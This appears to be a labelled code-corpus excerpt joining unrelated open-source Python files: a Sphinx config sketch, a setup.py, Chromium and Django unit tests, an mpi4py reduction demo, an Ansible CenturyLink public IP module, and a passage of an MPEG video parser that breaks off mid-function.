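A minimal sketch of wiring the extension above into a Sphinx build; the conf.py layout is an assumption, only the module name exts comes from the file above.

# docs/conf.py (sketch): make the local exts module importable and register it
# so the custom cross-reference roles (:setting:`...`, :model:`...`, ...) resolve.
import os
import sys

sys.path.insert(0, os.path.abspath("."))

extensions = [
    "exts",
]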
aio-libs/aiohttp_session
refs/heads/master
setup.py
1
from setuptools import setup
import os
import re


with open(os.path.join(os.path.abspath(os.path.dirname(
        __file__)), 'aiohttp_session', '__init__.py'), 'r',
        encoding='latin1') as fp:
    try:
        version = re.findall(r"^__version__ = '([^']+)'$",
                             fp.read(), re.M)[0]
    except IndexError:
        raise RuntimeError('Unable to determine version.')


def read(f):
    return open(os.path.join(os.path.dirname(__file__), f)).read().strip()


install_requires = ['aiohttp>=3.0.1',
                    'typing_extensions>=3.7.4; python_version<"3.8"']

extras_require = {
    'aioredis': ['aioredis>=1.0.0'],
    'aiomcache': ['aiomcache>=0.5.2'],
    'pycrypto': ['cryptography'],
    'secure': ['cryptography'],
    'pynacl': ['pynacl'],
}


setup(name='aiohttp-session',
      version=version,
      description=("sessions for aiohttp.web"),
      long_description='\n\n'.join((read('README.rst'),
                                    read('CHANGES.txt'))),
      classifiers=[
          'License :: OSI Approved :: Apache Software License',
          'Intended Audience :: Developers',
          'Programming Language :: Python',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.5',
          'Programming Language :: Python :: 3.6',
          'Programming Language :: Python :: 3.7',
          'Topic :: Internet :: WWW/HTTP',
          'Framework :: AsyncIO',
      ],
      author='Andrew Svetlov',
      author_email='andrew.svetlov@gmail.com',
      url='https://github.com/aio-libs/aiohttp_session/',
      license='Apache 2',
      packages=['aiohttp_session'],
      python_requires=">=3.5",
      install_requires=install_requires,
      include_package_data=True,
      extras_require=extras_require)
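# Illustrative note (not part of the original setup.py): each key of
# extras_require becomes an installable extra, so for example
#
#   pip install aiohttp-session[secure]
#
# would pull in cryptography on top of the packages listed in
# install_requires.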
IllusionRom-deprecated/android_platform_tools_idea
refs/heads/master
python/testData/inspections/PyTypeCheckerInspection/RightOperators.py
53
class C(object):
    pass


def test_right_operators():
    o = C()
    xs = [
        <warning descr="Expected type 'Integral', got 'C' instead">o</warning> * [],
    ]
PeterWangIntel/chromium-crosswalk
refs/heads/master
build/android/pylib/utils/device_temp_file_test.py
51
#!/usr/bin/env python # Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Unit tests for the contents of device_temp_file.py. """ import logging import os import sys import unittest from pylib import constants from pylib.device import adb_wrapper from pylib.device import device_errors from pylib.utils import device_temp_file from pylib.utils import mock_calls sys.path.append(os.path.join( constants.DIR_SOURCE_ROOT, 'third_party', 'pymock')) import mock # pylint: disable=F0401 class DeviceTempFileTest(mock_calls.TestCase): def setUp(self): test_serial = '0123456789abcdef' self.adb = mock.Mock(spec=adb_wrapper.AdbWrapper) self.adb.__str__ = mock.Mock(return_value=test_serial) self.watchMethodCalls(self.call.adb) def mockShellCall(self, cmd_prefix, action=''): """Expect an adb.Shell(cmd) call with cmd_prefix and do some action Args: cmd_prefix: A string, the cmd of the received call is expected to have this as a prefix. action: If callable, an action to perform when the expected call is received, otherwise a return value. Returns: An (expected_call, action) pair suitable for use in assertCalls. """ def check_and_return(cmd): self.assertTrue( cmd.startswith(cmd_prefix), 'command %r does not start with prefix %r' % (cmd, cmd_prefix)) if callable(action): return action(cmd) else: return action return (self.call.adb.Shell(mock.ANY), check_and_return) def mockExistsTest(self, exists_result): def action(cmd): if exists_result: return '' else: raise device_errors.AdbCommandFailedError( cmd, 'File not found', 1, str(self.adb)) return self.mockShellCall('test -e ', action) def testTempFileNameAlreadyExists(self): with self.assertCalls( self.mockShellCall('test -d /data/local/tmp'), self.mockExistsTest(True), self.mockExistsTest(True), self.mockExistsTest(True), self.mockExistsTest(False), self.mockShellCall('touch '), self.mockShellCall('rm -f ')): with device_temp_file.DeviceTempFile(self.adb) as tmpfile: logging.debug('Temp file name: %s' % tmpfile.name) def testTempFileLifecycle(self): with self.assertCalls( self.mockShellCall('test -d /data/local/tmp'), self.mockExistsTest(False), self.mockShellCall('touch ')): tempFileContextManager = device_temp_file.DeviceTempFile(self.adb) with mock.patch.object(self.adb, 'Shell'): with tempFileContextManager as tmpfile: logging.debug('Temp file name: %s' % tmpfile.name) self.assertEquals(0, self.adb.Shell.call_count) self.assertEquals(1, self.adb.Shell.call_count) args, _ = self.adb.Shell.call_args self.assertTrue(args[0].startswith('rm -f ')) if __name__ == '__main__': logging.getLogger().setLevel(logging.DEBUG) unittest.main(verbosity=2)
nvoron23/hue
refs/heads/master
desktop/core/ext-py/Django-1.6.10/tests/admin_scripts/custom_templates/project_template/additional_dir/extra.py
701
# this file uses the {{ extra }} variable
BackupTheBerlios/espressopp
refs/heads/master
contrib/mpi4py/mpi4py-1.3/demo/reductions/reductions.py
3
from mpi4py import MPI


class Intracomm(MPI.Intracomm):
    """
    Intracommunicator class with scalable, point-to-point based
    implementations of global reduction operations.
    """

    def __new__(cls, comm=None):
        return super(Intracomm, cls).__new__(cls, comm)

    def reduce(self, sendobj=None, recvobj=None, op=MPI.SUM, root=0):
        size = self.size
        rank = self.rank
        assert 0 <= root < size
        tag = MPI.COMM_WORLD.Get_attr(MPI.TAG_UB)-1

        if op in (MPI.MINLOC, MPI.MAXLOC):
            sendobj = (sendobj, rank)
        recvobj = sendobj
        mask = 1

        while mask < size:
            if (mask & rank) != 0:
                target = (rank & ~mask) % size
                self.send(recvobj, dest=target, tag=tag)
            else:
                target = (rank | mask)
                if target < size:
                    tmp = self.recv(None, source=target, tag=tag)
                    recvobj = op(recvobj, tmp)
            mask <<= 1

        if root != 0:
            if rank == 0:
                self.send(recvobj, dest=root, tag=tag)
            elif rank == root:
                recvobj = self.recv(None, source=0, tag=tag)

        if rank != root:
            recvobj = None

        return recvobj

    def allreduce(self, sendobj=None, recvobj=None, op=MPI.SUM):
        recvobj = self.reduce(sendobj, recvobj, op, 0)
        recvobj = self.bcast(recvobj, 0)
        return recvobj

    def scan(self, sendobj=None, recvobj=None, op=MPI.SUM):
        size = self.size
        rank = self.rank
        tag = MPI.COMM_WORLD.Get_attr(MPI.TAG_UB)-1

        if op in (MPI.MINLOC, MPI.MAXLOC):
            sendobj = (sendobj, rank)
        recvobj = sendobj
        partial = sendobj
        mask = 1

        while mask < size:
            target = rank ^ mask
            if target < size:
                tmp = self.sendrecv(partial, dest=target, source=target,
                                    sendtag=tag, recvtag=tag)
                if rank > target:
                    partial = op(tmp, partial)
                    recvobj = op(tmp, recvobj)
                else:
                    tmp = op(partial, tmp)
                    partial = tmp
            mask <<= 1

        return recvobj

    def exscan(self, sendobj=None, recvobj=None, op=MPI.SUM):
        size = self.size
        rank = self.rank
        tag = MPI.COMM_WORLD.Get_attr(MPI.TAG_UB)-1

        if op in (MPI.MINLOC, MPI.MAXLOC):
            sendobj = (sendobj, rank)
        recvobj = sendobj
        partial = sendobj
        mask = 1
        flag = False

        while mask < size:
            target = rank ^ mask
            if target < size:
                tmp = self.sendrecv(partial, dest=target, source=target,
                                    sendtag=tag, recvtag=tag)
                if rank > target:
                    partial = op(tmp, partial)
                    if rank != 0:
                        if not flag:
                            recvobj = tmp
                            flag = True
                        else:
                            recvobj = op(tmp, recvobj)
                else:
                    tmp = op(partial, tmp)
                    partial = tmp
            mask <<= 1

        if rank == 0:
            recvobj = None

        return recvobj
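# A minimal self-check sketch (not part of the original demo): compare the
# point-to-point allreduce implemented above against MPI's built-in one.
# Run under MPI, e.g. `mpiexec -n 4 python reductions.py`; the __main__ guard
# and the use of the rank as payload are assumptions made for this example.
if __name__ == '__main__':
    comm = Intracomm(MPI.COMM_WORLD)
    mine = comm.rank
    # both calls should yield the sum of all ranks on every process
    total = comm.allreduce(mine, op=MPI.SUM)
    expected = MPI.COMM_WORLD.allreduce(mine, op=MPI.SUM)
    assert total == expected, (total, expected)
    if comm.rank == 0:
        print("sum of ranks via point-to-point allreduce: %d" % total)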
elky/django
refs/heads/master
tests/gis_tests/test_fields.py
36
import copy

from django.contrib.gis.db.models.sql import AreaField, DistanceField
from django.test import SimpleTestCase


class FieldsTests(SimpleTestCase):

    def test_area_field_deepcopy(self):
        field = AreaField(None)
        self.assertEqual(copy.deepcopy(field), field)

    def test_distance_field_deepcopy(self):
        field = DistanceField(None)
        self.assertEqual(copy.deepcopy(field), field)
detiber/ansible
refs/heads/devel
lib/ansible/modules/cloud/centurylink/clc_publicip.py
70
#!/usr/bin/python # # Copyright (c) 2015 CenturyLink # # This file is part of Ansible. # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/> # ANSIBLE_METADATA = {'metadata_version': '1.0', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' module: clc_publicip short_description: Add and Delete public ips on servers in CenturyLink Cloud. description: - An Ansible module to add or delete public ip addresses on an existing server or servers in CenturyLink Cloud. version_added: "2.0" options: protocol: description: - The protocol that the public IP will listen for. default: TCP choices: ['TCP', 'UDP', 'ICMP'] required: False ports: description: - A list of ports to expose. This is required when state is 'present' required: False default: None server_ids: description: - A list of servers to create public ips on. required: True state: description: - Determine whether to create or delete public IPs. If present module will not create a second public ip if one already exists. default: present choices: ['present', 'absent'] required: False wait: description: - Whether to wait for the tasks to finish before returning. choices: [ True, False ] default: True required: False requirements: - python = 2.7 - requests >= 2.5.0 - clc-sdk author: "CLC Runner (@clc-runner)" notes: - To use this module, it is required to set the below environment variables which enables access to the Centurylink Cloud - CLC_V2_API_USERNAME, the account login id for the centurylink cloud - CLC_V2_API_PASSWORD, the account password for the centurylink cloud - Alternatively, the module accepts the API token and account alias. The API token can be generated using the CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login - CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login - CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud - Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment. 
''' EXAMPLES = ''' # Note - You must set the CLC_V2_API_USERNAME And CLC_V2_API_PASSWD Environment variables before running these examples - name: Add Public IP to Server hosts: localhost gather_facts: False connection: local tasks: - name: Create Public IP For Servers clc_publicip: protocol: TCP ports: - 80 server_ids: - UC1TEST-SVR01 - UC1TEST-SVR02 state: present register: clc - name: debug debug: var: clc - name: Delete Public IP from Server hosts: localhost gather_facts: False connection: local tasks: - name: Create Public IP For Servers clc_publicip: server_ids: - UC1TEST-SVR01 - UC1TEST-SVR02 state: absent register: clc - name: debug debug: var: clc ''' RETURN = ''' server_ids: description: The list of server ids that are changed returned: success type: list sample: [ "UC1TEST-SVR01", "UC1TEST-SVR02" ] ''' __version__ = '${version}' import os from distutils.version import LooseVersion try: import requests except ImportError: REQUESTS_FOUND = False else: REQUESTS_FOUND = True # # Requires the clc-python-sdk. # sudo pip install clc-sdk # try: import clc as clc_sdk from clc import CLCException except ImportError: CLC_FOUND = False clc_sdk = None else: CLC_FOUND = True from ansible.module_utils.basic import AnsibleModule class ClcPublicIp(object): clc = clc_sdk module = None def __init__(self, module): """ Construct module """ self.module = module if not CLC_FOUND: self.module.fail_json( msg='clc-python-sdk required for this module') if not REQUESTS_FOUND: self.module.fail_json( msg='requests library is required for this module') if requests.__version__ and LooseVersion(requests.__version__) < LooseVersion('2.5.0'): self.module.fail_json( msg='requests library version should be >= 2.5.0') self._set_user_agent(self.clc) def process_request(self): """ Process the request - Main Code Path :return: Returns with either an exit_json or fail_json """ self._set_clc_credentials_from_env() params = self.module.params server_ids = params['server_ids'] ports = params['ports'] protocol = params['protocol'] state = params['state'] if state == 'present': changed, changed_server_ids, requests = self.ensure_public_ip_present( server_ids=server_ids, protocol=protocol, ports=ports) elif state == 'absent': changed, changed_server_ids, requests = self.ensure_public_ip_absent( server_ids=server_ids) else: return self.module.fail_json(msg="Unknown State: " + state) self._wait_for_requests_to_complete(requests) return self.module.exit_json(changed=changed, server_ids=changed_server_ids) @staticmethod def _define_module_argument_spec(): """ Define the argument spec for the ansible module :return: argument spec dictionary """ argument_spec = dict( server_ids=dict(type='list', required=True), protocol=dict(default='TCP', choices=['TCP', 'UDP', 'ICMP']), ports=dict(type='list'), wait=dict(type='bool', default=True), state=dict(default='present', choices=['present', 'absent']), ) return argument_spec def ensure_public_ip_present(self, server_ids, protocol, ports): """ Ensures the given server ids having the public ip available :param server_ids: the list of server ids :param protocol: the ip protocol :param ports: the list of ports to expose :return: (changed, changed_server_ids, results) changed: A flag indicating if there is any change changed_server_ids : the list of server ids that are changed results: The result list from clc public ip call """ changed = False results = [] changed_server_ids = [] servers = self._get_servers_from_clc( server_ids, 'Failed to obtain server list from the CLC API') 
servers_to_change = [ server for server in servers if len( server.PublicIPs().public_ips) == 0] ports_to_expose = [{'protocol': protocol, 'port': port} for port in ports] for server in servers_to_change: if not self.module.check_mode: result = self._add_publicip_to_server(server, ports_to_expose) results.append(result) changed_server_ids.append(server.id) changed = True return changed, changed_server_ids, results def _add_publicip_to_server(self, server, ports_to_expose): result = None try: result = server.PublicIPs().Add(ports_to_expose) except CLCException as ex: self.module.fail_json(msg='Failed to add public ip to the server : {0}. {1}'.format( server.id, ex.response_text )) return result def ensure_public_ip_absent(self, server_ids): """ Ensures the given server ids having the public ip removed if there is any :param server_ids: the list of server ids :return: (changed, changed_server_ids, results) changed: A flag indicating if there is any change changed_server_ids : the list of server ids that are changed results: The result list from clc public ip call """ changed = False results = [] changed_server_ids = [] servers = self._get_servers_from_clc( server_ids, 'Failed to obtain server list from the CLC API') servers_to_change = [ server for server in servers if len( server.PublicIPs().public_ips) > 0] for server in servers_to_change: if not self.module.check_mode: result = self._remove_publicip_from_server(server) results.append(result) changed_server_ids.append(server.id) changed = True return changed, changed_server_ids, results def _remove_publicip_from_server(self, server): result = None try: for ip_address in server.PublicIPs().public_ips: result = ip_address.Delete() except CLCException as ex: self.module.fail_json(msg='Failed to remove public ip from the server : {0}. 
{1}'.format( server.id, ex.response_text )) return result def _wait_for_requests_to_complete(self, requests_lst): """ Waits until the CLC requests are complete if the wait argument is True :param requests_lst: The list of CLC request objects :return: none """ if not self.module.params['wait']: return for request in requests_lst: request.WaitUntilComplete() for request_details in request.requests: if request_details.Status() != 'succeeded': self.module.fail_json( msg='Unable to process public ip request') def _set_clc_credentials_from_env(self): """ Set the CLC Credentials on the sdk by reading environment variables :return: none """ env = os.environ v2_api_token = env.get('CLC_V2_API_TOKEN', False) v2_api_username = env.get('CLC_V2_API_USERNAME', False) v2_api_passwd = env.get('CLC_V2_API_PASSWD', False) clc_alias = env.get('CLC_ACCT_ALIAS', False) api_url = env.get('CLC_V2_API_URL', False) if api_url: self.clc.defaults.ENDPOINT_URL_V2 = api_url if v2_api_token and clc_alias: self.clc._LOGIN_TOKEN_V2 = v2_api_token self.clc._V2_ENABLED = True self.clc.ALIAS = clc_alias elif v2_api_username and v2_api_passwd: self.clc.v2.SetCredentials( api_username=v2_api_username, api_passwd=v2_api_passwd) else: return self.module.fail_json( msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD " "environment variables") def _get_servers_from_clc(self, server_ids, message): """ Gets list of servers form CLC api """ try: return self.clc.v2.Servers(server_ids).servers except CLCException as exception: self.module.fail_json(msg=message + ': %s' % exception) @staticmethod def _set_user_agent(clc): if hasattr(clc, 'SetRequestsSession'): agent_string = "ClcAnsibleModule/" + __version__ ses = requests.Session() ses.headers.update({"Api-Client": agent_string}) ses.headers['User-Agent'] += " " + agent_string clc.SetRequestsSession(ses) def main(): """ The main function. Instantiates the module and calls process_request. :return: none """ module = AnsibleModule( argument_spec=ClcPublicIp._define_module_argument_spec(), supports_check_mode=True ) clc_public_ip = ClcPublicIp(module) clc_public_ip.process_request() if __name__ == '__main__': main()
coolbombom/CouchPotato
refs/heads/master
library/hachoir_parser/video/mpeg_video.py
86
""" Moving Picture Experts Group (MPEG) video version 1 and 2 parser. Information: - http://www.mpucoder.com/DVD/ - http://dvd.sourceforge.net/dvdinfo/ - http://www.mit.jyu.fi/mweber/leffakone/software/parsempegts/ - http://homepage.mac.com/rnc/EditMpegHeaderIFO.html - http://standards.iso.org/ittf/PubliclyAvailableStandards/c025029_ISO_IEC_TR_11172-5_1998(E)_Software_Simulation.zip This is a sample encoder/decoder implementation for MPEG-1. Author: Victor Stinner Creation date: 15 september 2006 """ from hachoir_parser import Parser from hachoir_parser.audio.mpeg_audio import MpegAudioFile from hachoir_core.field import (FieldSet, FieldError, ParserError, Bit, Bits, Bytes, RawBits, PaddingBits, NullBits, UInt8, UInt16, RawBytes, PaddingBytes, Enum) from hachoir_core.endian import BIG_ENDIAN from hachoir_core.stream import StringInputStream from hachoir_core.text_handler import textHandler, hexadecimal class FragmentGroup: def __init__(self, parser): self.items = [] self.parser = parser self.args = {} def add(self, item): self.items.append(item) def createInputStream(self): # FIXME: Use lazy stream creation data = [] for item in self.items: if 'rawdata' in item: data.append( item["rawdata"].value ) data = "".join(data) # FIXME: Use smarter code to send arguments tags = {"class": self.parser, "args": self.args} tags = tags.iteritems() return StringInputStream(data, "<fragment group>", tags=tags) class CustomFragment(FieldSet): def __init__(self, parent, name, size, parser, description=None, group=None): FieldSet.__init__(self, parent, name, description, size=size) if not group: group = FragmentGroup(parser) self.group = group self.group.add(self) def createFields(self): yield RawBytes(self, "rawdata", self.size//8) def _createInputStream(self, **args): return self.group.createInputStream() class Timestamp(FieldSet): static_size = 36 def createValue(self): return (self["c"].value << 30) + (self["b"].value << 15) + self["a"].value def createFields(self): yield Bits(self, "c", 3) yield Bit(self, "sync[]") # =True yield Bits(self, "b", 15) yield Bit(self, "sync[]") # =True yield Bits(self, "a", 15) yield Bit(self, "sync[]") # =True class SCR(FieldSet): static_size = 35 def createFields(self): yield Bits(self, "scr_a", 3) yield Bit(self, "sync[]") # =True yield Bits(self, "scr_b", 15) yield Bit(self, "sync[]") # =True yield Bits(self, "scr_c", 15) class PackHeader(FieldSet): def createFields(self): if self.stream.readBits(self.absolute_address, 2, self.endian) == 1: # MPEG version 2 yield Bits(self, "sync[]", 2) yield SCR(self, "scr") yield Bit(self, "sync[]") yield Bits(self, "scr_ext", 9) yield Bit(self, "sync[]") yield Bits(self, "mux_rate", 22) yield Bits(self, "sync[]", 2) yield PaddingBits(self, "reserved", 5, pattern=1) yield Bits(self, "stuffing_length", 3) count = self["stuffing_length"].value if count: yield PaddingBytes(self, "stuffing", count, pattern="\xff") else: # MPEG version 1 yield Bits(self, "sync[]", 4) yield Bits(self, "scr_a", 3) yield Bit(self, "sync[]") yield Bits(self, "scr_b", 15) yield Bit(self, "sync[]") yield Bits(self, "scr_c", 15) yield Bits(self, "sync[]", 2) yield Bits(self, "mux_rate", 22) yield Bit(self, "sync[]") def validate(self): if self["mux_rate"].value == 0: return "Invalid mux rate" sync0 = self["sync[0]"] if (sync0.size == 2 and sync0.value == 1): # MPEG2 pass if not self["sync[1]"].value \ or not self["sync[2]"].value \ or self["sync[3]"].value != 3: return "Invalid synchronisation bits" elif (sync0.size == 4 and sync0.value == 2): # MPEG1 if not 
self["sync[1]"].value \ or not self["sync[2]"].value \ or self["sync[3]"].value != 3 \ or not self["sync[4]"].value: return "Invalid synchronisation bits" else: return "Unknown version" return True class SystemHeader(FieldSet): def createFields(self): yield Bits(self, "marker[]", 1) yield Bits(self, "rate_bound", 22) yield Bits(self, "marker[]", 1) yield Bits(self, "audio_bound", 6) yield Bit(self, "fixed_bitrate") yield Bit(self, "csps", description="Constrained system parameter stream") yield Bit(self, "audio_lock") yield Bit(self, "video_lock") yield Bits(self, "marker[]", 1) yield Bits(self, "video_bound", 5) length = self['../length'].value-5 if length: yield RawBytes(self, "raw[]", length) class defaultParser(FieldSet): def createFields(self): yield RawBytes(self, "data", self["../length"].value) class Padding(FieldSet): def createFields(self): yield PaddingBytes(self, "data", self["../length"].value) class VideoExtension2(FieldSet): def createFields(self): yield Bit(self, "sync[]") # =True yield Bits(self, "ext_length", 7) yield NullBits(self, "reserved[]", 8) size = self["ext_length"].value if size: yield RawBytes(self, "ext_bytes", size) class VideoExtension1(FieldSet): def createFields(self): yield Bit(self, "has_private") yield Bit(self, "has_pack_lgth") yield Bit(self, "has_pack_seq") yield Bit(self, "has_pstd_buffer") yield Bits(self, "sync[]", 3) # =7 yield Bit(self, "has_extension2") if self["has_private"].value: yield RawBytes(self, "private", 16) if self["has_pack_lgth"].value: yield UInt8(self, "pack_lgth") if self["has_pack_seq"].value: yield Bit(self, "sync[]") # =True yield Bits(self, "pack_seq_counter", 7) yield Bit(self, "sync[]") # =True yield Bit(self, "mpeg12_id") yield Bits(self, "orig_stuffing_length", 6) if self["has_pstd_buffer"].value: yield Bits(self, "sync[]", 2) # =1 yield Enum(Bit(self, "pstd_buffer_scale"), {True: "128 bytes", False: "1024 bytes"}) yield Bits(self, "pstd_size", 13) class VideoSeqHeader(FieldSet): ASPECT=["forbidden", "1.0000 (VGA etc.)", "0.6735", "0.7031 (16:9, 625line)", "0.7615", "0.8055", "0.8437 (16:9, 525line)", "0.8935", "0.9157 (CCIR601, 625line)", "0.9815", "1.0255", "1.0695", "1.0950 (CCIR601, 525line)", "1.1575", "1.2015", "reserved"] FRAMERATE=["forbidden", "23.976 fps", "24 fps", "25 fps", "29.97 fps", "30 fps", "50 fps", "59.94 fps", "60 fps"] def createFields(self): yield Bits(self, "width", 12) yield Bits(self, "height", 12) yield Enum(Bits(self, "aspect", 4), self.ASPECT) yield Enum(Bits(self, "frame_rate", 4), self.FRAMERATE) yield Bits(self, "bit_rate", 18, "Bit rate in units of 50 bytes") yield Bits(self, "sync[]", 1) # =1 yield Bits(self, "vbv_size", 10, "Video buffer verifier size, in units of 16768") yield Bit(self, "constrained_params_flag") yield Bit(self, "has_intra_quantizer") if self["has_intra_quantizer"].value: for i in range(64): yield Bits(self, "intra_quantizer[]", 8) yield Bit(self, "has_non_intra_quantizer") if self["has_non_intra_quantizer"].value: for i in range(64): yield Bits(self, "non_intra_quantizer[]", 8) class GroupStart(FieldSet): def createFields(self): yield Bit(self, "drop_frame") yield Bits(self, "time_hh", 5) yield Bits(self, "time_mm", 6) yield PaddingBits(self, "time_pad[]", 1) yield Bits(self, "time_ss", 6) yield Bits(self, "time_ff", 6) yield Bit(self, "closed_group") yield Bit(self, "broken_group") yield PaddingBits(self, "pad[]", 5) class PacketElement(FieldSet): def createFields(self): yield Bits(self, "sync[]", 2) # =2 if self["sync[0]"].value != 2: raise ParserError("Unknown 
video elementary data") yield Bits(self, "is_scrambled", 2) yield Bits(self, "priority", 1) yield Bit(self, "alignment") yield Bit(self, "is_copyrighted") yield Bit(self, "is_original") yield Bit(self, "has_pts", "Presentation Time Stamp") yield Bit(self, "has_dts", "Decode Time Stamp") yield Bit(self, "has_escr", "Elementary Stream Clock Reference") yield Bit(self, "has_es_rate", "Elementary Stream rate") yield Bit(self, "dsm_trick_mode") yield Bit(self, "has_copy_info") yield Bit(self, "has_prev_crc", "If True, previous PES packet CRC follows") yield Bit(self, "has_extension") yield UInt8(self, "size") # Time stamps if self["has_pts"].value: yield Bits(self, "sync[]", 4) # =2, or 3 if has_dts=True yield Timestamp(self, "pts") if self["has_dts"].value: if not(self["has_pts"].value): raise ParserError("Invalid PTS/DTS values") yield Bits(self, "sync[]", 4) # =1 yield Timestamp(self, "dts") if self["has_escr"].value: yield Bits(self, "sync[]", 2) # =0 yield SCR(self, "escr") if self["has_es_rate"].value: yield Bit(self, "sync[]") # =True yield Bits(self, "es_rate", 14) # in units of 50 bytes/second yield Bit(self, "sync[]") # =True if self["has_copy_info"].value: yield Bit(self, "sync[]") # =True yield Bits(self, "copy_info", 7) if self["has_prev_crc"].value: yield textHandler(UInt16(self, "prev_crc"), hexadecimal) # --- Extension --- if self["has_extension"].value: yield VideoExtension1(self, "extension") if self["extension/has_extension2"].value: yield VideoExtension2(self, "extension2") class VideoExtension(FieldSet): EXT_TYPE = {1:'Sequence',2:'Sequence Display',8:'Picture Coding'} def createFields(self): yield Enum(Bits(self, "ext_type", 4), self.EXT_TYPE) ext_type=self['ext_type'].value if ext_type==1: # Sequence extension yield Bits(self, 'profile_and_level', 8) yield Bit(self, 'progressive_sequence') yield Bits(self, 'chroma_format', 2) yield Bits(self, 'horiz_size_ext', 2) yield Bits(self, 'vert_size_ext', 2) yield Bits(self, 'bit_rate_ext', 12) yield Bits(self, 'pad[]', 1) yield Bits(self, 'vbv_buffer_size_ext', 8) yield Bit(self, 'low_delay') yield Bits(self, 'frame_rate_ext_n', 2) yield Bits(self, 'frame_rate_ext_d', 5) elif ext_type==2: # Sequence Display extension yield Bits(self, 'video_format', 3) yield Bit(self, 'color_desc_present') if self['color_desc_present'].value: yield UInt8(self, 'color_primaries') yield UInt8(self, 'transfer_characteristics') yield UInt8(self, 'matrix_coeffs') yield Bits(self, 'display_horiz_size', 14) yield Bits(self, 'pad[]', 1) yield Bits(self, 'display_vert_size', 14) yield NullBits(self, 'pad[]', 3) elif ext_type==8: yield Bits(self, 'f_code[0][0]', 4, description="forward horizontal") yield Bits(self, 'f_code[0][1]', 4, description="forward vertical") yield Bits(self, 'f_code[1][0]', 4, description="backward horizontal") yield Bits(self, 'f_code[1][1]', 4, description="backward vertical") yield Bits(self, 'intra_dc_precision', 2) yield Bits(self, 'picture_structure', 2) yield Bit(self, 'top_field_first') yield Bit(self, 'frame_pred_frame_dct') yield Bit(self, 'concealment_motion_vectors') yield Bit(self, 'q_scale_type') yield Bit(self, 'intra_vlc_format') yield Bit(self, 'alternate_scan') yield Bit(self, 'repeat_first_field') yield Bit(self, 'chroma_420_type') yield Bit(self, 'progressive_frame') yield Bit(self, 'composite_display') if self['composite_display'].value: yield Bit(self, 'v_axis') yield Bits(self, 'field_sequence', 3) yield Bit(self, 'sub_carrier') yield Bits(self, 'burst_amplitude', 7) yield Bits(self, 'sub_carrier_phase', 8) 
yield NullBits(self, 'pad[]', 2) else: yield NullBits(self, 'pad[]', 6) else: yield RawBits(self, "raw[]", 4) class VideoPicture(FieldSet): CODING_TYPE = ["forbidden","intra-coded (I)", "predictive-coded (P)", "bidirectionally-predictive-coded (B)", "dc intra-coded (D)", "reserved", "reserved", "reserved"] def createFields(self): yield Bits(self, "temporal_ref", 10) yield Enum(Bits(self, "coding_type", 3), self.CODING_TYPE) yield Bits(self, "vbv_delay", 16) if self['coding_type'].value in (2,3): # predictive coding yield Bit(self, 'full_pel_fwd_vector') yield Bits(self, 'forward_f_code', 3) if self['coding_type'].value == 3: # bidi predictive coding yield Bit(self, 'full_pel_back_vector') yield Bits(self, 'backward_f_code', 3) yield Bits(self, "padding", 8-(self.current_size % 8)) class VideoSlice(FieldSet): def createFields(self): yield Bits(self, "quantizer_scale", 5) start=self.absolute_address+self.current_size+3 pos=self.stream.searchBytes('\0\0\1',start,start+1024*1024*8) # seek forward by at most 1MB if pos is None: pos=self.root.size yield RawBits(self, "data", pos-start+3) class VideoChunk(FieldSet): tag_info = { 0x00: ("pict_start[]", VideoPicture, "Picture start"), 0xB2: ("data_start[]", None, "Data start"), 0xB3: ("seq_hdr[]", VideoSeqHeader,"Sequence header"), 0xB4: ("seq_err[]", None, "Sequence error"), 0xB5: ("ext_start[]", VideoExtension,"Extension start"), 0xB7: ("seq_end[]", None, "Sequence end"), 0xB8: ("group_start[]", GroupStart, "Group start"), } def __init__(self, *args): FieldSet.__init__(self, *args) tag = self["tag"].value if tag in self.tag_info: self._name, self.parser, self._description = self.tag_info[tag] if not self.parser: self.parser = defaultParser elif 0x01 <= tag <= 0xaf: self._name, self.parser, self._description = ('slice[]', VideoSlice, 'Picture slice') else: self.parser = defaultParser def createFields(self): yield Bytes(self, "sync", 3) yield textHandler(UInt8(self, "tag"), hexadecimal) if self.parser and self['tag'].value != 0xb7: yield self.parser(self, "content") class VideoStream(Parser): endian = BIG_ENDIAN def createFields(self): while self.current_size < self.size: pos=self.stream.searchBytes('\0\0\1',self.current_size,self.current_size+1024*1024*8) # seek forward by at most 1MB if pos is not None: padsize = pos-self.current_size if padsize: yield PaddingBytes(self, "pad[]", padsize//8) yield VideoChunk(self, "chunk[]") class Stream(FieldSet): def createFields(self): padding=0 position=0 while True: next=ord(self.parent.stream.readBytes(self.absolute_address+self.current_size+position, 1)) if next == 0xff: padding+=1 position+=8 elif padding: yield PaddingBytes(self, "pad[]", padding) padding=None position=0 elif 0x40 <= next <= 0x7f: yield Bits(self, "scale_marker", 2) # 1 yield Bit(self, "scale") scale=self['scale'].value if scale: scaleval=1024 else: scaleval=128 yield textHandler(Bits(self, "size", 13), lambda field:str(field.value*scaleval)) elif 0x00 <= next <= 0x3f: yield Bits(self, "ts_marker", 2) # 0 yield Bit(self, "has_pts") yield Bit(self, "has_dts") if self['has_pts'].value: yield Timestamp(self, "pts") if self['has_dts'].value: yield PaddingBits(self, "pad[]", 4) yield Timestamp(self, "dts") if self.current_size % 8 == 4: yield PaddingBits(self, "pad[]", 4) break elif 0x80 <= next <= 0xbf: # MPEG-2 extension yield PacketElement(self, "pkt") break else: # 0xc0 - 0xfe: unknown break length = self["../length"].value - self.current_size//8 if length: tag=self['../tag'].value group=self.root.streamgroups[tag] 
